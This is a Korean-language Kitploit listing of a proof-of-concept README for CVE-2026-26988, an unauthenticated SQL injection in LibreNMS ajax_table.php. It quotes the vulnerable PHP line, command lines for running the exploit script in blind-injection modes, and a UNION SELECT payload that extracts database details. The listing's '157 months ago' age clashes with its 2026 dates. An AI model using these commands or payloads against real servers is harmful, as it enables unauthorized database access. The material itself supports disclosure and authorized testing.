Skip to content
KitploitKITPLOIT
도구익스플로잇블로그
Log in
제출
도구익스플로잇블로그
제출

해킹, 침투 테스트 및 사이버 보안 도구를 당신의 보안 무기고에!

Kitploit은 해킹, 사이버 보안 및 침투 테스트 도구 디렉토리입니다. 최신 프로젝트 업데이트를 발견하여 취약점을 찾고, 시스템을 분석하고, 테스트를 자동화하고, 보안을 강화하세요.

피드문의개인정보© 2026 Kitploit

도구 디렉토리

카테고리

모든 카테고리 보기
Loading categories
CVE-2026-26988-LibreNMS-SQLi — LibreNMS ajax_table.php의 인증되지 않은 SQL 인젝션에 대한 개념 증명 익스플로잇으로, 승인된 보안 테스트를 위한 시간 기반 및 부울 기반 블라인드 인젝션 기법을 시연합니다. | Kitploit
도구/GitHubGitHub/mbanyamer/cve-2026-26988-librenms-sqli
Vulnerability AnalysisExploitationWeb Application ExploitationWeb SecurityPenetration TestingLearning & Education
GitHubmbanyamer/cve-2026-26988-librenms-sqli

CVE-2026-26988-LibreNMS-SQLi

LibreNMS ajax_table.php의 인증되지 않은 SQL 인젝션에 대한 개념 증명 익스플로잇으로, 승인된 보안 테스트를 위한 시간 기반 및 부울 기반 블라인드 인젝션 기법을 시연합니다.

저장소 보기
157개월 전아직 검토되지 않음

인기

모두 보기 →

커뮤니티에서 가장 많이 사용되는 도구를 찾아보세요.

모든 도구 탐색

도구 컬렉션을 둘러보세요

모든 도구 보기 →
공유

Author Role Country Platform Vulnerability CVE CVSS Status

CVE-2026-26988 – LibreNMS 인증되지 않은 SQL 인젝션 PoC

인증되지 않은 SQL 인젝션이 LibreNMS ajax_table.php의 IPv6 주소 검색 매개변수를 통해 발생합니다.

  • 영향받는 버전: LibreNMS ≤ 25.12.0
  • 수정된 버전: LibreNMS ≥ 26.1 (커밋 15429580baba03ed1dd377bada1bde4b7a1175a1)
  • CVSS v4.0: 9.3 Critical
    CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:H/VA:N
  • CWE: CWE-89 (SQL 명령에 사용되는 특수 요소의 부적절한 중화 – SQL 인젝션)

취약점 요약

search_type=ipv6일 때 address 매개변수는 /를 기준으로 주소와 프리픽스로 분리됩니다.
프리픽스는 이스케이프 없이 SQL 쿼리에 직접 연결됩니다:

$sql .= " AND ipv6_prefixlen = '$prefix'";

프리픽스 부분의 작은따옴표(')는 문자열 리터럴을 벗어나게 하여 → 임의의 SQL 인젝션을 가능하게 합니다.

공격 흐름 다이어그램

flowchart TD
    A[Attacker] -->|1. HTTP POST to /ajax_table.php| B[LibreNMS Web Server]
    B -->|2. id=address-search & search_type=ipv6| C[Parse address parameter]
    C -->|3. Split on '/' → $address / $prefix| D[Build vulnerable SQL]
    D -->|4. Concatenate: ipv6_prefixlen = '$prefix'| E[MySQL / MariaDB]
    E -->|5. Execute injected query| F[Return results / error / delay]
    F -->|6. Attacker observes response / timing| A

    subgraph "Injection Point"
        D
    end

    style D fill:#ff4d4d,stroke:#333,stroke-width:2px,color:#fff

개념 증명(PoC) 사용법

요구 사항

  • Python 3.x
  • requests 라이브러리 (pip install requests)

기본 테스트 (구문 오류 / 500)

python3 exploit.py http://target/librenms --test

시간 기반 블라인드 확인 (권장)

python3 exploit.py http://192.168.1.50/librenms --time

→ 응답이 5~6초 이상 걸리면 → 취약함

부울 기반 블라인드 테스트

python3 exploit.py http://target/librenms --boolean

사용자 정의 페이로드 예시

python3 exploit.py http://target/librenms --test --payload "64' UNION SELECT database(),user(),version() -- "

이 저장소의 파일

  • exploit.py .............. 메인 PoC 스크립트 (필요 시 cve-2026-26988-poc.py에서 이름 변경)
  • README.md ............... 이 파일

책임 있는 공개(Responsible Disclosure)

  • 보고일: 2026년 2월 (GitHub Security Advisory를 통해)
  • 수정 커밋: 15429580baba... → PR #18777
  • 권고: https://github.com/librenms/librenms/security/advisories/GHSA-h3rv-q4rq-pqcv

법적 및 윤리적 고지

이 개념 증명(PoC)은 교육 및 승인된 보안 테스트 목적으로만 제공됩니다.

소유자의 명시적인 서면 허가 없이 이 코드를 어떤 시스템이나 네트워크에도 사용하지 마십시오.
무단 사용은 미국의 컴퓨터 사기 및 남용법(CFAA) 또는 해당 국가의 동등한 법률을 포함한 법률을 위반할 수 있습니다.

사용에 따른 책임은 본인에게 있습니다.


저자: Mohammed Idrees Banyamer
인스타그램: @banyamer_security
날짜: 2026년 2월 20일

도구 다운로드